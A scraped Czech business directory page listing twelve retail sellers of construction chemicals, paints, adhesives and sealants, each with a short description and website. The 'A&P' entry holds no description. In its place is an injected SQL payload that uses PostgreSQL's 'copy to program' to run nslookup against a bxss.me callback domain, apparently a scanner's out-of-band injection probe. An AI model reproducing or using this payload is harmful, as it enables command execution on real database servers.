rejstrikfirem.cz

logo RejstrikFirem.cz
TOPlist
WWW katalog (23) => Obchody a obchůdky (48) => Stavebniny a stavební hmoty (maloobchod) (7) => Stavební chemie (maloobchod) (3)
Maloobchodní prodejci stavební chemie
Zobrazuji záznamy 1 až 12 z celkem 12.

A&P   [ Více info ]

Dovoz%20a%20prodej%20automobilu.‘;copy (select ‘‘) to program ‘nslookup dns.sqli.\013405.2371-5568.2371.c9b4b.\1.bxss.me

 

Barvy laky Židlochovice.REMMERS,MISTRAL,HET

Prodej barev,laků a pomůcek na malování jako štětce, válečky, brusivo a další.
web: http://www.bohaty.net
 

DRIZORO CZ, s.r.o.

Stavební chemie DRIZORO-hydroizolační nátěry, sanace a opravy konstrukcí, dilatační spáry, rychletuhnoucí, zálivkové aj. malty, injektážní systémy, polymerbetony, opravy podlah a prům. ploch, závěrečné, hydrofobní a ochranné nátěry, doplňkové výrobky.
web: http://www.drizoro-cz.cz
 

FARBE BOHEMIA - barvy, laky, fasády, spec. barvy Jaeger

barvy, laky, fasády, omítky, sěrkované mramory Villa Venezia, zateplovací systémy, spec. barvy Jaeger, stříkané tapety, kovářské barvy, míchání barev na zakázku, lazur na dřevo i povrchy stěn, malířské nářadí a stroje, poradenství, zasílání materiálu.
web: http://www.farbebohemia.cz
 

Lepíky - materiál pro lepení a lepidla.

Prodáváme široký sortiment materiálů pro lepení, lepících pásek a lepidel. Dále speciální lepící technologie - samolepící protiskluzové pásky, samolepící suché zipy a gelové lepící body.
web: http://www.lepiky.cz
 

LEVEL 92, spol. s r.o.

Dodávka řeživa truhlářského, stavebního. Dodávka a montáž: žulové, mramorové dlažby, keramické obdklady a dlažby, přírodní a konglomerovaný kámen, interiérové kamenné prvky, kuchyňské linky, umyvadlové desky,atd. Dodávky stavební chemie Mapei.
web: http://www.level92.cz
 

MBL

Izolace kompozitní technologií
web: http://www.mbl-bro.cz
 

PASO - pěny, akryláty, silikony a ostatní

Vyrábíme a prodáváme velko i maloobchodním způsobem polyuretanové pěny, tmely, lepidla, silikonové i akrylové hmoty. Poskytujeme odborné poradenství. Dodáváme nábytkové zámky a kování na skříňky i kontejnery výrobcům od fi. Hettich a Lehmann (MLM).
web: http://paso.cz
 

PAVLÍN s.r.o.

prodej zateplovacích systémů PRINCE COLOR,BAUMIT,TERRANOVA, fasádních a interiérových barev, stavební chemie, nátěrů na dřevo a kov, stavebního nářadí
web: http://www.pavlin.cz
 

SIKA - STAVEBNÍ MATERIÁLY

Prodej a aplikace mat. stavební chemie SIKA. Přísady do malt a betonů, sanační, zálivkové a vyrovnávací malty, nátěry a stěrky betonových podlah, chemicky odolné povrchy, nátěry a penetrace betonu, polyuretanové tmely, vodotěsné stěrky, těsnění spár
web: http://www.ntplus.cz
 

STAVEBNINY VAJBAR s.r.o.

Maloobchodní prodej, spolupráce se stavebními firmami. Stavební materiál, poradenství, rozvoz zakoupeného zboží, zajištění stavebního úvěru, montáž střešních oken. Prodejny: Bořetice, Hustopeče, Podivín
web: http://www.stavebniny-vajbar.cz
 

VMBal s.r.o. - bezpečně na pracovišti

Prodej vybavení pro bezpečnost a ochranu zdraví na pracovišti - lékárničky, náplně do lékarniček, zdravotnické nosítka, drogové testy, detektory alkoholu, protiskluzové nátěry,stojany a držáky jízdních kol, parkovací zábrany, nájezdové rampy.
web: http://www.vmbal.cz
 


PŘIDAT FIRMU DO:

Stránka vygenerována
za 0.24755 s